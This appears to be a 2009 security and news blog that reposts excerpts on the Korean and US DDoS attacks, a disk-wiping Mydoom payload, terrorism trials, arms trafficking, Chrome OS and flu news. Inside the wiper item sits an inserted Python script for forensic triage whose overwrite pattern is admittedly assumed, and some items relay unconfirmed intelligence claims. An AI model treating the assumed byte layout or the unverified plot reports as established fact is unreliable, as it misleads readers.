The private sector has a ton of very smart security professionals...but most don't have access to classified intelligence (HUMINT, SIGINT, etc)....and thus are making an educated guess with just the technical (network, malware analysis, etc) information.

Even with that in mind, some of those professionals aren't on board with pointing the finger @ North Korea just yet...

"The timing is auspicious, but none of the data I have suggests North Korea," Jose Nazario, a senior security researcher at Arbor Networks, told CSO earlier this week. Joe Stewart, director of SecureWorks' counter-threat unit, told Computerworld, "There's nothing in there to suggest that it's state sponsored."

"Still zero evidence of North Korean involvement," said Stewart when contacted Friday for an update.

Point Two

DDoS attacks are noisy....really dangerous and sophisticated cyber attacks are rarely noisy. In general, I would say attacks like Titan Rain and NASA's Avocado have the potential to damage our national safety & security much much more than any DDoS attack.

DDoS attacks are easy to detect, while that targeted attack against a power plant's SCADA is not. This type of attack could easily be a smokescreen for a much more serious targeted attack.

Point Three

DDoS attacks aren't new...the corporate world has been dealing with these for years. DDoS attacks are a favorite among extortionists for example. The all-volunteer group formerly known as Castlecops put such a dent in cybercrime activities...that bad guys have been trying to DDoS them since 2006.

The methods of protecting against DDoS attacks are just as well known. Clearly, in this case...some sites were better prepared than others. According to the malware analysis conducted by the South Korean anti-virus firm Hauri (PDF)....many non-government sites were targeted.

www.yahoo.com
www.voanews.com
www.amazon.com
www.usbank.com

Were these sites down for an extended amount of time? I wonder why?
Perhaps because they were better prepared for just this type of attack.

Nick Shapiro, a White House spokesman, said that as of the night of July 7, all federal Web sites were back up and running and that the attacks “had absolutely no effect on the White House's day-to-day operations."

"The preventative measures in place to deal with frequent attempts to disrupt WhiteHouse.gov's service performed as planned, keeping the site stable and available to the general public, although visitors from regions in Asia may have been affected," he added.

So perhaps instead of talking about a counterattack...the government should think about building a better defense overall.

Tamiflu Detected in River Water in Japan

Via Virology.ws -

Tamiflu (Oseltamivir) is one of the few antiviral drugs available for treatment of influenza. Use of the drug has increased substantially because of the emergence of the 2009 H1N1 pandemic strain, against which no vaccine is yet available. A recent study has shown that low levels of oseltamivir can be detected in the aquatic environment. This finding raises the possibility that aquatic birds which harbor influenza virus could be exposed to the antiviral, leading to selection of drug resistant viruses.

[...]

Because Japan is the largest consumer of Tamiflu, the levels of OC were determined in the Yodo River system in the Kyoto and Osaka prefectures. This river was selected because it is distant from the sea and located in a densely populated area. Surface water was collected before (June 2007) and during (December 2007 and February 2008) the flu season. No OC was detected in water samples from June 2007. At the onset of the flu season, December 2007, the antiviral was found at levels between 2 and 7 nanograms per liter (ng/L). At the peak of the flu season, in February, levels increased to 12 – 58 ng/L. Levels of OC were higher in water samples taken near sewage treatment plants, compared with those obtained farther away. The amounts detected are close to the concentration of drug that causes 50% inhibition of virus replication (the IC50) in cell cultures, reported to be between 80–230 ng/L.

The authors suggest that dabbling ducks, a natural reservoir of influenza virus, could ingest OC. As influenza in dabbling ducks is a gastrointestinal infection, the virus would encounter oseltamivir in the gut, which could promote selection of viruses resistant to the drug.

It is not known whether OC in aquatic environments leads to influenza virus resistance to Tamiflu. Clearly additional studies must be done to determine whether the antiviral drug can be found in other waters around the world. Influenza viruses should be isolated from aquatic birds living in OC contaminated environments to monitor resistance to Tamiflu.

PCs Used in Korean DDoS Attacks May Self Destruct

Via Washington Post -

There are signs that the concerted cyber attacks targeting U.S. and Korean government and commercial Web sites this past week are beginning to wane. Yet, even if the assaults were to be completely blocked tomorrow, the attackers could still have one last, inglorious weapon in their arsenal: New evidence suggests that the malicious code responsible for spreading this attack includes instructions to overwrite the infected PC's hard drive.

According to Joe Stewart, director of malware research at SecureWorks, the malware that powers this attack -- a version of the Mydoom worm -- is designed to download a payload from a set of Web servers. Included in that payload is a Trojan horse program that overwrites the data on the hard drive with a message that reads "memory of the independence day," followed by as many "u" characters as it takes to write over every sector of every physical drive attached to the compromised system.

Stewart said he tested the self-destruct Trojan in his lab and found that it indeed erases the hard drive on the compromised system. For now, however, the Mydoom component isn't triggering that feature.

"One possibility is there's a bug in the code and it's supposed to run but it doesn't," Stewart said. "Or, there may be a time factor involved, where it's not supposed to erase the hard drive until a certain time."

Such an order would spell certain disaster for many tens of thousands of Microsoft Windows PCs. Several experts I spoke with yesterday and today estimated that between 60,000 and 100,000 systems may be infected with this potentially suicidal malware.

[...]

Meanwhile, the attacks that slowed washingtonpost.com and several other U.S.-based Web sites have since been focused almost exclusively on Korean Web sites. Alex Lanstein, senior security researcher at Fireeye, a Milpitas, Calif., based computer security firm, said the attackers dropped the U.S. government and commercial Web sites from their hit-list on Tuesday afternoon, after those sites began working with large Internet service providers to filter and block attack traffic.

Lanstein said the unknown attackers have since concentrated the attack on a handful of S. Korean government and commercial Web sites, such as egov.go.kr, Web portal daum.net, online auction house auction.go.kr, and Korean news site chosun.com.

[...]

Update, July 10, 10:00 a.m. ET: South Korean anti-virus firm Hauri has published an exhaustive analysis of this malicious software, available at this link here (PDF). It states that at 00:00 on July 10 the malicious code deletes files with certain extensions, that the "operating system not found" error appears at the next boot, and that the system cannot then be started normally.

Meanwhile, SecureWorks' Stewart said it looks like it is only the first megabyte of the hard drive that is overwritten. "Still with the [Windows Master Boot Record] and partition table gone, it is enough to make it unbootable and unrecoverable for the normal user with only a Windows CD in recovery mode," Stewart said. "It has subroutines to delete or encrypt files after that, so even more advanced recovery techniques are made more difficult."
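For a responder triaging a suspect machine, the description above (first megabyte overwritten, MBR and partition table gone) translates into a simple check on a raw disk image. The following is an added example, not Hauri's or SecureWorks' analysis code; it assumes the wiper's output is laid out exactly as the article words it (the marker string followed by "u" bytes), and both sample images are constructed.

```python
"""Triage a raw disk image's first megabyte for the overwrite described above.
Added example, not Hauri's or SecureWorks' code. The wiper's on-disk layout
(marker string, then 'u' bytes) is assumed from the article's wording, and
the two sample images below are constructed."""
from typing import Dict, List

SECTOR = 512
BOOT_SIG = b"\x55\xaa"             # standard MBR boot signature at offset 510
MARKER = b"memory of the independence day"


def boot_signature_ok(sector0: bytes) -> bool:
    """A valid MBR ends with 0x55 0xAA at offset 510."""
    return len(sector0) >= SECTOR and sector0[510:512] == BOOT_SIG


def partition_entries(sector0: bytes) -> List[Dict[str, int]]:
    """Parse the four 16-byte partition entries at offset 446, skipping empty ones."""
    entries = []
    for i in range(4):
        e = sector0[446 + 16 * i: 446 + 16 * (i + 1)]
        if len(e) < 16 or e == b"\x00" * 16:
            continue
        entries.append({
            "bootable": int(e[0] == 0x80),
            "type": e[4],
            "lba_start": int.from_bytes(e[8:12], "little"),
            "sectors": int.from_bytes(e[12:16], "little"),
        })
    return entries


def matches_wiper_pattern(data: bytes) -> bool:
    """True when data is the marker followed only by 'u' bytes (assumed layout)."""
    if not data.startswith(MARKER):
        return False
    tail = data[len(MARKER):]
    return len(tail) > 0 and set(tail) == {ord("u")}


def triage(image: bytes) -> Dict[str, object]:
    """Classify a raw image as intact, unbootable, or matching the wiper."""
    sector0 = image[:SECTOR]
    first_mb = image[:1024 * 1024]
    parts = partition_entries(sector0)
    sig_ok = boot_signature_ok(sector0)
    # check the whole first MB (the article says only that much is overwritten)
    # and, for a short capture, sector 0 on its own
    wiped = matches_wiper_pattern(first_mb) or matches_wiper_pattern(sector0)
    if wiped:
        verdict = "wiped: first sectors match the reported overwrite pattern"
    elif not sig_ok or not parts:
        verdict = "unbootable: boot signature or partition table missing"
    else:
        verdict = "mbr intact"
    return {"boot_signature": sig_ok, "partitions": parts,
            "wiper_pattern": wiped, "verdict": verdict}


def make_intact_image(size: int = 2 * 1024 * 1024) -> bytes:
    """Constructed image: one bootable NTFS-type (0x07) partition, valid signature."""
    s0 = bytearray(SECTOR)
    entry = bytes([0x80, 0, 0, 0, 0x07, 0, 0, 0])   # status, CHS start, type, CHS end
    entry += (2048).to_bytes(4, "little") + (409600).to_bytes(4, "little")
    s0[446:462] = entry
    s0[510:512] = BOOT_SIG
    return bytes(s0) + b"\x00" * (size - SECTOR)


def make_wiped_image(size: int = 2 * 1024 * 1024) -> bytes:
    """Constructed image after the overwrite: marker plus 'u' across the first MB."""
    first_mb = MARKER + b"u" * (1024 * 1024 - len(MARKER))
    return first_mb + b"\x00" * (size - len(first_mb))
```

Run `triage()` over the first couple of megabytes of a suspect drive image; a machine matching the pattern is one where, as Stewart notes, a plain Windows CD recovery will not bring the data back.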

Thursday, July 9, 2009

Mexico: Economics and the Arms Trade

Via Stratfor (Global Security & Intelligence Report) -

On June 26, the small Mexican town of Apaseo el Alto, in Guanajuato state, was the scene of a deadly firefight between members of Los Zetas and federal and local security forces. The engagement began when a joint patrol of Mexican soldiers and police officers responded to a report of heavily armed men at a suspected drug safe house. When the patrol arrived, a 20-minute firefight erupted between the security forces and gunmen in the house as well as several suspects in two vehicles who threw fragmentation grenades as they tried to escape.

When the shooting ended, 12 gunmen lay dead, 12 had been taken into custody and several soldiers and police officers had been wounded. At least half of the detained suspects admitted to being members of Los Zetas, a highly trained Mexican cartel group known for its use of military weapons and tactics.

When authorities examined the safe house they discovered a mass grave that contained the remains of an undetermined number of people (perhaps 14 or 15) who are believed to have been executed and then burned beyond recognition by Los Zetas. The house also contained a large cache of weapons, including assault rifles and fragmentation grenades. Such military ordnance is frequently used by Los Zetas and the enforcers who work for their rival cartels.

STRATFOR has been closely following the cartel violence in Mexico for several years now, and the events that transpired in Apaseo el Alto are by no means unique. It is not uncommon for the Mexican authorities to engage in large firefights with cartel groups, encounter mass graves or recover large caches of arms. However, the recovery of the weapons in Apaseo el Alto does provide an opportunity to once again focus on the dynamics of Mexico’s arms trade.

--------------------------

The section above is just the main lead-in into yet another very informative article from Stratfor.

The full article linked above is recommended if you are interested in Mexico and arms trafficking in general.

Here is an interesting block that gives you a better understanding of some of those numbers we have heard about...

According to the report, some 30,000 firearms were seized from criminals by Mexican officials in 2008. Out of these 30,000 firearms, information pertaining to 7,200 of them, (24 percent) was submitted to the U.S. Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF) for tracing. Of these 7,200 guns, only about 4,000 could be traced by the ATF, and of these 4,000, some 3,480 (87 percent) were shown to have come from the United States.

This means that the 87 percent figure comes from the number of weapons submitted by the Mexican government to the ATF that could be successfully traced and not from the total number of weapons seized by the Mexicans or even from the total number of weapons submitted to the ATF for tracing. The 3,480 guns positively traced to the United States equals less than 12 percent of the total arms seized in 2008 and less than 48 percent of all those submitted by the Mexican government to the ATF for tracing.

In a response to the GAO report, the U.S. Department of Homeland Security (DHS) wrote a letter to the GAO (published as an appendix to the report) calling the GAO’s use of the 87 percent statistic “misleading.” The DHS further noted, “Numerous problems with the data collection and sample population render this assertion as unreliable.”

Alleged Iranian and Hezbollah Agents on Trial for Targeting Russian-Operated Radar Station in Azerbaijan

Via The Jamestown Foundation -

A trial of six people accused of terrorism and other serious crimes began on June 24 in Baku, Azerbaijan. Two Lebanese citizens, Karaki Ali Muhammad and Najmaddin Ali Hussein, were charged with treason, revealing secret information abroad, espionage, preparation of acts of terrorism, drug trafficking and arms smuggling. Four Azerbaijani citizens, Javid Mamadov, Vidadi Rasulov, Mushfig Amanov and Afgan Balashev all face similar charges. The alleged terrorist cell planned to bomb the Israeli Embassy in Baku as well as blow up the Russian-operated Qabala radar station. According to investigation records, the group was receiving orders from Iran’s Revolutionary Guards and Lebanon’s Hezbollah. Both Lebanese “had been trained and sent to Azerbaijan by terrorist organizations Hezbollah and al-Qaeda.” (Trend News [Baku], June 10). The suspects allegedly planned to attract local people to cooperate with them in carrying out terrorist attacks in densely populated areas. After getting their instructions from Hezbollah, the two Lebanese arrived in Iran, where agents of the Revolutionary Guards helped them to cross the border into Azerbaijan. Once there, they are alleged to have established a group consisting of local citizens, convincing them to bomb the Qabala radar station (Dayaz, May 27).

The investigation revealed that members of the group visited the Qabala region in August 2007 and took photos of the radar station. Meanwhile, group leader Karaki Ali Muhammad visited Baku several times since 2007 to collect information about Israel’s embassy. During the trial the leader of the ring admitted that he had represented Hezbollah in Iran since 2003 and his monthly wage from this organization was $900. He was ordered to collect information on the Jewish Cultural Center in Baku as well investigate a number of Iranians who “help Israel” (Turan Information Agency [Baku], June 19). Karaki Ali Muhammad was born in 1967 in the Lebanese city of Nabatia but lived for a long time in Tehran. Officially, Muhammad did not have a job while in Tehran, but he accompanied tourists to the holy places of Iran. He assembled tourist groups near Tehran’s al-Nabi Mosque and was hired there by an employee of the Iranian Ministry of Security and Intelligence (Vezarat-e Ettela’at va Anmiat-e Keshvar – VEVAK).

ASCAP Makes Outlandish Copyright Claims on Cell Phone Ringtones

Via EFF -

The Electronic Frontier Foundation (EFF) urged a federal court Wednesday to reject bogus copyright claims in a ringtone royalty battle that could raise costs for consumers, jeopardize consumer rights, and curtail new technological innovation.

Millions of Americans have bought musical ringtones, often clips from favorite popular songs, for their mobile phones. Mobile phone carriers pay royalties to song owners for the right to sell these snippets to their customers. But as part of a ploy to squeeze more money out of the mobile phone companies, the American Society of Composers, Authors, and Publishers (ASCAP) has told a federal court that each time a phone rings in a public place, the phone user has violated copyright law. Therefore, ASCAP argues, phone carriers must pay additional royalties or face legal liability for contributing to what they claim is cell phone users' copyright infringement. In an amicus brief filed Wednesday, EFF points out that copyright law does not reach public performances "without any purpose of direct or indirect commercial advantage" -- clearly the case with cell phone ringtones. If phone users are not infringing copyright law, then mobile phone service providers are not contributing to any infringement.

"This is an outlandish argument from ASCAP," said EFF Senior Intellectual Property Attorney Fred von Lohmann. "Are the millions of people who have bought ringtones breaking the law if they forget to silence their phones in a restaurant? Under this reasoning from ASCAP, it would be a copyright violation for you to play your car radio with the window down!"

ASCAP has responded by saying that it does not plan to charge mobile phone users, just mobile phone service providers. But if ASCAP prevails, consumers could find themselves targeted by other copyright owners for "public performances." Worse, these wrongheaded legal claims cast a shadow over innovators who are building gadgets that help consumers get the most from their copyright privileges.

"Because it is legal for consumers to play music in public, it's also legal for my mobile phone carrier to sell me a ringtone and a phone to do it," said von Lohmann. "Otherwise it would be illegal to sell all kinds of technologies that help us enjoy our fair use, first sale, and other copyright privileges."

The Center for Democracy and Technology and Public Knowledge also joined the EFF brief.

For the full amicus brief:
http://www.eff.org/files/filenode/US_v_ASCAP/US%20v%20ASCAP%20EFF%20ATT%...

For more on this case:
http://www.eff.org/cases/us-v-ascap

Contact:

Rebecca Jeschke
Media Relations Director
Electronic Frontier Foundation
press@eff.org

Merriam Webster: New Words for 2009

http://www.merriam-webster.com/info/newwords09.htm

Hardworking word-lovers everywhere can now learn the meaning of the word staycation ("a vacation spent at home or nearby") along with nearly 100 other new words and senses added to Merriam-Webster's Collegiate Dictionary, Eleventh Edition. America's best-selling dictionary offers its new 2009 entries in its updated print edition and online here at Merriam-Webster.com.

Many of the new words address: concerns about the environment (carbon footprint, green collar), government activities (earmark, waterboarding), health and medicine (cardioprotective, locavore, naproxen, neuroprotective), pop culture (docusoap, fan fiction, flash mob, reggaeton), online activities (sock puppet, vlog, webisode), as well as several miscellaneous terms such as haram, memory foam, missalette, and zip line.

Saudi Arabia Convicts 300 Al-Qaida Suspects

Via Yahoo! News (AP) -

A Saudi criminal court has convicted and sentenced an al-Qaida militant to death and given more than 300 others jail terms, fines and travel bans in the country's first known terrorism trials for suspected members of the terror network, officials said Wednesday.

A Justice Ministry spokesman said the court looked into 179 cases involving the 330 defendants who were found guilty. The spokesman did not give any details on the person sentenced to death, but his punishment suggests he could be a senior member of al-Qaida.

Saudi Arabia has pursued an aggressive campaign against militants since May 2003, when they first began attacks in the kingdom, which is al-Qaida leader Osama bin Laden's birthplace and home to 15 of the 19 Sept. 11 hijackers.

The network's attacks have targeted expatriate residential compounds, oil installations and government buildings.

However, the first known legal proceedings, which have been held in utmost secrecy, apparently did not start until last year. Authorities had been reluctant to resort to trials for terrorism charges that could result in death sentences until they had shown the public that every effort had been made to give the men a chance to renounce their crimes and be rehabilitated.

The 330 are believed to be among the 991 suspected militants that Interior Minister Prince Nayef has said had been charged with participating in terrorist attacks over the past five years.

Sheik Abdullah al-Saadan, the Justice Ministry spokesman, told Saudi TV the court has acquitted "some" defendants. He did not say how many nor did he say when the trials began. There have been vague reports of such trials in local media recently.

"The verdicts ranged from ... jail terms that depend on the nature of the crime and death in one of the cases," al-Saadan said.

The rulings also included financial penalties, travel bans and house arrests in the city of the defendants' choice, al-Saadan added. A transcript of his remarks was carried by the official Saudi Press Agency.

Al-Saadan said the verdicts can be appealed. He also said preparations are under way to give access to the press to cover the trials, apparently referring to those of the remaining detainees.

A statement issued by a spokesman for the Bureau of Investigation and General Prosecution said the defendants were accused of belonging to the "deviant group," a euphemism for al-Qaida.

They were also accused of supporting and financing terrorism, going to areas of conflict to fight, and coordinating and communicating with "external parties that seek to conspire against national security by creating chaos and disrupting security," according to the unnamed spokesman.

The statement, also carried by the official press agency, said the charge sheets included "incriminating evidence of these dangerous acts and proof that every defendant has carried out the charges against him."

There have been no major attacks since February 2006, when suicide bombers tried but failed to attack an oil facility at the Abqaiq oil complex, the world's largest oil processing facility, in eastern Saudi Arabia.

Milw0rm is Back Up and Running - For a While

http://www.milw0rm.com/

str0ke said the following on Twitter just 5 mins ago...

milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box just sit there.
How long it will be up is unknown...and while I have seen some chatter about possible groups taking it over (and running it as it is)...no solid news has been made at this point.

Wednesday, July 8, 2009

Growing Presence in the Courtroom: Cellphone Data as Witness

Via NYTimes -

The pivotal role that cellphone records played in these two prominent New York murder trials this year highlights the surge in law enforcement’s use of increasingly sophisticated cellular tracking techniques to keep tabs on suspects before they are arrested and build criminal cases against them by mapping their past movements.

But cellphone tracking is raising concerns about civil liberties in a debate that pits public safety against privacy rights. Existing laws do not provide clear or uniform guidelines: Federal wiretap laws, outpaced by technological advances, do not explicitly cover the use of cellphone data to pinpoint a person’s location, and local court rulings vary widely across the country.

In one case that unsettled cellphone companies, a sheriff in Alabama told a carrier he needed to track a cellphone in an emergency involving a child — she turned out to be his teenage daughter, who was late returning from a date.

For more than a decade, investigators have been able to match an antenna tower with a cellphone signal to track a phone’s location to within a radius of about 200 yards in urban areas and up to 20 miles in rural areas. Now many more cellphones are equipped with global-positioning technology that makes it possible to pinpoint a user’s position with much greater precision, down to a few dozen yards.

To determine where a suspect’s phone was in the past — as in the Mallayev and Littlejohn cases — investigators use company records that show a phone’s approximate location at the beginning and end of a call.

To track suspects in real time, law enforcement officials must ask a phone company to “ping,” or send a signal to, a phone; for the effort to succeed, the phone must be turned on, though it does not have to be in use. The police can then use a vehicle with signal-tracking equipment to narrow down the location.

The frequency and ease with which law enforcement agencies access cellphone data to track people is difficult to assess. Civil liberties groups recently obtained data from the Justice Department through a lawsuit showing that in some jurisdictions, including New Jersey and Florida, courts often allow federal prosecutors to track the location of cellphone users in real time without search warrants.

Investigators seeking warrants must provide a judge with probable cause that a crime has been committed. But investigators often obtain cell-tracking records under lower standards of judicial review — through subpoenas, which are granted routinely, or through an intermediate type of court order based on an argument that the information requested would be relevant to an investigation.

In what would be the highest-level court decision on the issue so far, a federal appeals court in Pennsylvania is expected to rule this summer on whether search warrants are required for the most basic cellphone tracking data — the electronic footprints that cellphone users leave behind in company records, often without realizing it.

In March, Google announced that it would require search warrants before releasing GPS data that pinpoints the movements of customers who use its mapping applications — like Latitude, which lets people see where their friends are — on their phones.

But phone and Internet companies want Congress to clarify the laws so that they are clear about their legal responsibilities.

Civil libertarians do not oppose using cellphone surveillance to solve crimes or save people in emergencies, but they worry that the legal gray area is enabling it to happen without much scrutiny or discussion.

“The cost of carrying a cellphone should not include the loss of one’s personal privacy,” said Catherine Crump, a lawyer for the American Civil Liberties Union, which filed a lawsuit along with the Electronic Frontier Foundation after the Justice Department did not respond to a Freedom of Information request for data. Federal and local law enforcement officials argue that people who obey the law have nothing to fear from cellphone tracking.

Firefox Stability to Get a Boost with Multiprocess Browsing

Via arstechnica.com -

Mozilla has launched a new project called Electrolysis that aims to bring multiprocess browsing to Firefox. According to Mozilla, splitting up the page rendering workload into multiple processes will improve the browser's performance, security, and stability. The developers have already assembled a prototype that renders a page in a separate process from the interface shell in which it is displayed.

Mozilla has explored the possibility of adopting a multiprocessing approach for Firefox in the past, but the idea didn't gain serious traction in the Firefox developer community until it was implemented by Google and Microsoft in their respective web browsers. Google's Chrome browser uses a separate process for each page, an architectural approach that facilitates much more effective security sandboxing and prevents page-specific rendering glitches from crashing the entire browser. Chrome even includes a process manager tool that can be used to see the status and resource consumption of each page.

[...]

Jones says that his prototype represents the work that the Electrolysis developers have done to meet the requirements specified by "phase I" of Mozilla's multiprocess roadmap. To bootstrap the development of the IPC system, Mozilla is using some code from Chromium, the open source development version of Google's browser. The developers are contemplating the possibility of replacing existing Firefox components, such as the browser's network stack, with additional code from Chromium.

The experimental development work that is being done by various contributors on the Electrolysis project was recently consolidated into a single version control repository. The developers hope to have nightly builds ready for developer testing soon, but they caution that it will not yet work on Mac OS X. They are looking for volunteer Mac developers to participate in the project.

Electrolysis is going to be a truly enormous project. It's not clear yet if it will be ready in time for the next release of Firefox, which is codenamed Namaroka. The work on Electrolysis will be done parallel to Namaroka development, so it will not impede other plans to improve the browser. The early Electrolysis prototype and other parts that have been implemented so far are highly impressive. The project is off to a very promising start and has the potential to bring a lot of value to the Firefox browser and its users.

Milw0rm Closes Up Shop

http://209.85.229.132/search?q=cache:UB9G4tPVbxoJ:www.milw0rm.com/+milw0rm.com&cd=1&hl=es&ct=clnk&gl=es

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting people's work out fast enough to be proud of; 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

--------------------------

Clearly this is a sad day, but I wish str0ke the best...and thank him for all the great information through the years. Milw0rm will be sorely missed.

Dino Dai Zovi on Mac OS X Rootkits, Mac Exploitation & Hacking Contests

Via Threatpost (Digital Underground Podcast) -

Dennis Fisher talks with security researcher Dino Dai Zovi about his upcoming Black Hat talk on Mac OS X rootkits, exploiting the Mac and the value of hacking contests and internal code reviews.

http://www.threatpost.com/sites/default/files/digital_underground_23.mp3

GAO Smuggles IED Materials in Federal Buildings, Citing Security Gaps

Via FoxNews -

Government investigators smuggled bomb-making materials into federal buildings past the police agency charged with protecting those buildings and found numerous other gaps in security, according to a congressional report.

The Government Accountability Office said investigators carried bomb-making materials past security at 10 federal buildings. Security at these buildings and a total of about 9,000 federal buildings around the country is provided by the Federal Protective Service, a target of the probe.

Once GAO investigators got the materials in the buildings, the report said, they constructed explosive devices and carried them around inside. For security reasons, the GAO report did not give the location of the buildings.

The report was made available to The Associated Press in advance of a hearing scheduled Wednesday of the Senate Homeland Security and Governmental Affairs Committee.

--------------------------------

GAO-09-859T - Preliminary Results Show Federal Protective Service's Ability to Protect Federal Facilities Is Hampered By Weaknesses in Its Contract Security Guard Program (PDF)

Here are some of the juicy highlights which I found interesting....
  • A guard was caught using government computers, while he was supposed to be standing post, to further his private for-profit adult website.
  • A guard failed to recognize or did not properly x-ray a box containing semi-automatic handguns at the loading dock at one federal facility we visited. FPS only became aware of the situation because the handguns were delivered to FPS.
But the details of the covert IED testing show the real threat...
We identified substantial security vulnerabilities related to FPS’s guard program. Each time they tried, in April and May 2009, our investigators successfully passed undetected through security checkpoints monitored by FPS’s guards, with the components for an IED concealed on their persons at 10 level IV facilities in four cities in major metropolitan areas.

The specific components for this device, items used to conceal the device components, and the methods of concealment that we used during our covert testing are classified, and thus are not discussed in this testimony. Of the 10 level IV facilities we penetrated, 8 were government owned and 2 were leased facilities. The facilities included field offices of a U.S. Senator and U.S. Representative as well as agencies of the Departments of Homeland Security, Transportation, Health and Human Services, Justice, State and others. The two leased facilities did not have any guards at the access control point at the time of our testing.

Introducing the Google Chrome OS

Via the Official Google Blog -

It's been an exciting nine months since we launched the Google Chrome browser. Already, over 30 million people use it regularly. We designed Google Chrome for people who live on the web — searching for information, checking email, catching up on the news, shopping or just staying in touch with friends. However, the operating systems that browsers run on were designed in an era where there was no web. So today, we're announcing a new project that's a natural extension of Google Chrome — the Google Chrome Operating System. It's our attempt to re-think what operating systems should be.

Google Chrome OS is an open source, lightweight operating system that will initially be targeted at netbooks. Later this year we will open-source its code, and netbooks running Google Chrome OS will be available for consumers in the second half of 2010. Because we're already talking to partners about the project, and we'll soon be working with the open source community, we wanted to share our vision now so everyone understands what we are trying to achieve.

Speed, simplicity and security are the key aspects of Google Chrome OS. We're designing the OS to be fast and lightweight, to start up and get you onto the web in a few seconds. The user interface is minimal to stay out of your way, and most of the user experience takes place on the web. And as we did for the Google Chrome browser, we are going back to the basics and completely redesigning the underlying security architecture of the OS so that users don't have to deal with viruses, malware and security updates. It should just work.

Google Chrome OS will run on both x86 as well as ARM chips and we are working with multiple OEMs to bring a number of netbooks to market next year. The software architecture is simple — Google Chrome running within a new windowing system on top of a Linux kernel. For application developers, the web is the platform. All web-based applications will automatically work and new applications can be written using your favorite web technologies. And of course, these apps will run not only on Google Chrome OS, but on any standards-based browser on Windows, Mac and Linux thereby giving developers the largest user base of any platform.

[...]

We have a lot of work to do, and we're definitely going to need a lot of help from the open source community to accomplish this vision. We're excited for what's to come and we hope you are too. Stay tuned for more updates in the fall and have a great summer.

US & German Intel: Al Qaeda Plots Multiple Attacks on US & Israel-bound Airliners

Via Debka.com -

Western anti-terror agencies have warned that a large group of 15-20 al Qaeda terrorists, trained in Pakistan and Algeria to hijack and blow up airliners, deployed secretly in at least six European and Middle East countries in early July. They are standing ready to carry out multiple terrorist attacks.

The terrorists are believed to have landed in Britain, Germany, France, Italy, Turkey and Egypt.

The dates to watch, local authorities were warned, were July 4; July 7, the fourth anniversary of the 7/7 attacks on the British transport system in which 52 people died; and July 8-9, when the G8 summit meets in the Italian town of L'Aquila. US president Barack Obama will fly in from talks with Russian leaders in Moscow.

Al Qaeda planners, say the Western sources, know it is extremely hard to break through the massive security cordons protecting summit leaders. They are therefore planning to hijack passenger planes of airlines belonging to the targeted states and blow them up in mid-air.

DEBKAfile's counter-terror sources report the first specific red alert on Saturday, July 4, referred to the possible hijack of Turkish Airways planes taking off from Turkish airports for US destinations or Tel Aviv. Special precautionary measures were put in place at both ends of their routes.

The alert is still in force.

Taliban Launches Operation ‘Iron Net’ Against US Marines in Afghanistan

Via Daily Times (Pakistan) -

The Taliban said on Monday they have launched a guerrilla operation to thwart a major assault by the newly-deployed US Marines on their Helmand strongholds.

Operation Foladi Jal would teach the Marines “a lesson,” Taliban spokesman Yousuf Ahmadi told AFP by telephone from an unknown location.

About 4,000 Marines poured into the southern province on Thursday in an operation called Khanjar (dagger) to tackle the Taliban in the region.

“In response to Operation Khanjar by the invading forces, we have launched the operation,” Ahmadi said. The operation would include improvised bomb explosions and “hit-and-run guerrilla attacks”, Ahmadi said.

“We will not engage them in front battles. We would rather hit them by mines and guerrilla attacks,” he said.

Interior Ministry Officials in Pakistan Arrested for Weapons Scam

Via Dawn.com (Pakistan) -

ISLAMABAD: Three officers from the interior ministry were arrested on Tuesday for illegally issuing weapons licenses, DawnNews reports.

The officials have been charged with issuing 161 weapons licenses despite a legal ban on the sale of arms.

Interior Ministry Secretary Syed Kamal Shah told a Senate sub-committee that these three officers pocketed Rs7.5 million by issuing the licenses illegally.

Meanwhile, a top security official also told the committee that they have intelligence that a terrorist may strike Islamabad in the next forty-eight hours.

Federal Websites Knocked Out by DDoS Attack

Via Google (AP) -

A widespread and unusually resilient computer attack that began July 4 knocked out the Web sites of several government agencies, including some that are responsible for fighting cyber crime, The Associated Press has learned.

The Treasury Department, Secret Service, Federal Trade Commission and Transportation Department Web sites were all down at varying points over the holiday weekend and into this week, according to officials inside and outside the government. Some of the sites were still experiencing problems Tuesday evening. Cyber attacks on South Korean government and private sites also may be linked, officials there said.

U.S. officials refused to publicly discuss details of the cyber attack. But Amy Kudwa, spokeswoman for the Homeland Security Department, said the agency's U.S. Computer Emergency Readiness Team issued a notice to federal departments and other partner organizations about the problems and "advised them of steps to take to help mitigate against such attacks."

The U.S., she said, sees attacks on its networks every day, and measures have been put in place to minimize the impact on federal Web sites.

It was not clear whether other federal government sites also were attacked.

Others familiar with the U.S. outage, which is called a denial of service attack, said that the fact that the government Web sites were still being affected three days after it began signaled an unusually lengthy and sophisticated attack. The officials spoke on condition of anonymity because they were not authorized to speak on the matter.

Web sites of major South Korean government agencies, banks and Internet sites also were paralyzed in a suspected cyber attack Tuesday. Ahn Jeong-eun, a spokeswoman at the Korea Information Security Agency, said the U.S. and South Korean attacks appeared to be linked.

The South Korean sites included the presidential Blue House, the Defense Ministry, the National Assembly, Shinhan Bank, Korea Exchange Bank and top Internet portal Naver. They have been down or had access problems since late Tuesday, Ahn said.

Kudwa had no comment on the South Korean attacks.

Two government officials acknowledged that the Treasury and Secret Service sites were brought down, and said the agencies were working with their Internet service provider to resolve the problem.

Ben Rushlo, director of Internet technologies at Keynote Systems, called it a "massive outage" and said problems with the Transportation Department site began Saturday and continued until Monday, while the FTC site was down Sunday and Monday.

Keynote Systems is a mobile and Web site monitoring company based in San Mateo, Calif. The company publishes data detailing outages on Web sites, including 40 government sites it watches.

According to Rushlo, the Transportation Web site was "100 percent down" for two days, so that no Internet users could get through to it. The FTC site, meanwhile, started to come back online late Sunday, but even on Tuesday Internet users still were unable to get to the site 70 percent of the time.

"This is very strange. You don't see this," he said. "Having something 100 percent down for a 24-hour-plus period is a pretty significant event."

He added that, "The fact that it lasted for so long and that it was so significant in its ability to bring the site down says something about the site's ability to fend off (an attack) or about the severity of the attack."

Tuesday, July 7, 2009

Novel H1N1 Flu Situation Update

http://www.cdc.gov/h1n1flu/update.htm
Data reported to CDC by July 2, 2009, 11:00 AM ET.

33,902 confirmed and probable cases with 170 deaths in 53 US states / territories (including the District of Columbia, Puerto Rico and the U.S. Virgin Islands)

